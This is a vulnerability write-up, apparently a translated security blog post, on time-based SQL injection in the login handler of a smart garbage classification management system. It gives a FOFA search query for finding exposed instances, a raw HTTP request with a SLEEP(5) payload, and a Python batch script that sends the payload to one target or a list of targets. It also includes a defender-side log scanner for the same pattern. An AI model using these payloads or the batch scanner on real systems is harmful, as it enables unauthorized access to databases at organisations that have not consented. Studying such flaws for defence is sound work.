
SQL Injection - Smart Garbage Classification Management System

Vulnerability description


Disclaimer: the techniques, ideas and tools in this article are provided only for security-oriented learning and exchange; nobody may use them for illegal purposes or for profit, otherwise they bear the consequences themselves!

The smart garbage classification management system is used by enterprises that produce smart trash cans, kitchen-waste bins and smart litter bins, and relies on AI, facial recognition, mobile internet, big data and IoT technologies. The system has a SQL injection vulnerability through which an attacker can obtain sensitive database information.


Affected versions


All versions?


FOFA query

title="智能垃圾分类管理系统"


Environment setup

Vulnerability reproduction

On the login page, capture the page traffic with Burp;

POST /ghc_master/data/action.admindata.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 96
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224


If the response returns 1 only after about 5 seconds, the injected SLEEP(5) has executed and the SQL injection vulnerability is present;
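A defender-side check, added here as an example that is not part of the original post: it parses request records for the login handler and flags the quote-breaking, time-based SLEEP pattern shown in the captured request, marking a hit as confirmed only when the server actually stalled for the requested delay. TARGET_PATH, inspect_record, scan, the (path, body, elapsed seconds) record shape and the SAMPLE data are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Assumed names and record format for this example (not from the original post).
TARGET_PATH = "/ghc_master/data/action.admindata.php"
# MySQL calls that stall a query; the PoC on this page uses SLEEP(5).
TIME_FUNC = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(\s*(\d+)", re.IGNORECASE)

def inspect_record(path, body, elapsed_s):
    """Return a finding dict when a request to the admin login carries a
    quote-breaking value with a time function, else None. 'confirmed' is
    True when the server actually stalled for the requested delay."""
    if path != TARGET_PATH:
        return None
    params = parse_qs(body, keep_blank_values=True)
    if params.get("do", [""])[0] != "adminlogin":
        return None
    for field in ("username", "password"):
        value = params.get(field, [""])[0]
        m = TIME_FUNC.search(value)
        if m and ("'" in value or '"' in value):
            delay = int(m.group(2)) if m.group(1).upper() == "SLEEP" else 0
            return {
                "field": field,
                "function": m.group(1).upper(),
                "requested_delay": delay,
                "elapsed": elapsed_s,
                "confirmed": delay > 0 and elapsed_s >= delay,
            }
    return None

def scan(records):
    """Run inspect_record over (path, body, elapsed_seconds) tuples."""
    findings = []
    for path, body, elapsed_s in records:
        finding = inspect_record(path, body, elapsed_s)
        if finding:
            findings.append(finding)
    return findings

# Constructed sample records: a normal login, the page's PoC payload that
# stalled for 5 s, a similar payload that did not stall, and an unrelated path.
SAMPLE = [
    (TARGET_PATH, "do=adminlogin&username=admin&password=secret", 0.12),
    (TARGET_PATH, "do=adminlogin&username=admin' AND (SELECT 2847 FROM "
                  "(SELECT(SLEEP(5)))trlL)-- sNmL&password=4224", 5.21),
    (TARGET_PATH, "do=adminlogin&username=admin' AND SLEEP(5)-- x&password=1", 0.09),
    ("/index.php", "q=sleep(5)", 0.05),
]
```

A hit with confirmed=False still deserves attention: the payload was sent but the query did not stall, which is what a patched or filtered instance looks like.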

Batch PoC

The following Python script can check targets in batch;

# encoding: utf-8
import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning  # suppress TLS warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # suppress TLS warnings

def longer():
    print('+++FOFA:title="智能垃圾分类管理系统"')
    print('+++python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('+++python xxx.py -f/--file xxx.txt')
    print('+++作者:longer')
    print('-----------------------------------------------------')

if len(sys.argv) == 1:
    longer()
    sys.exit()
p = argparse.ArgumentParser(description='longer')
p.add_argument('-u', '--url', help='目标url', default='')
p.add_argument('-f', '--file', help='文件', default='')
xp = p.parse_args()
url = xp.url
file = xp.file

# Same time-based payload as the captured request: SLEEP(5) inside the username field
data = "do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224"
headers = {
    'User-Agent': 'Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/90.0.4430.212Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    'Cookie': 'PHPSESSID=hfq66id9bum90sovr9gmn7klde'
}

def check(target):
    """Send the payload to the login handler of one target and print the result.
    Vulnerable: the body is exactly '1' and, because of SLEEP(5), the response
    only arrives after about 5 seconds."""
    target = target.strip()
    if not target.startswith(('http:', 'https:')):
        target = 'http://' + target
    try:
        r = requests.post(url=target + '/ghc_master/data/action.admindata.php',
                          headers=headers, data=data, timeout=15, verify=False)
        if r.status_code == 200 and r.text.strip() == '1' and r.elapsed.total_seconds() >= 5:
            print(target + '存在sql注入')
        else:
            print(target + '不存在sql注入')
    except Exception:
        print(target + '异常')

if url != '':
    check(url)
if file != '':
    # One target per line; the handler path is appended inside check(), so the
    # request goes to the login handler rather than the bare host.
    with open(file, 'r') as f:
        for line in f:
            if line.strip():
                check(line)
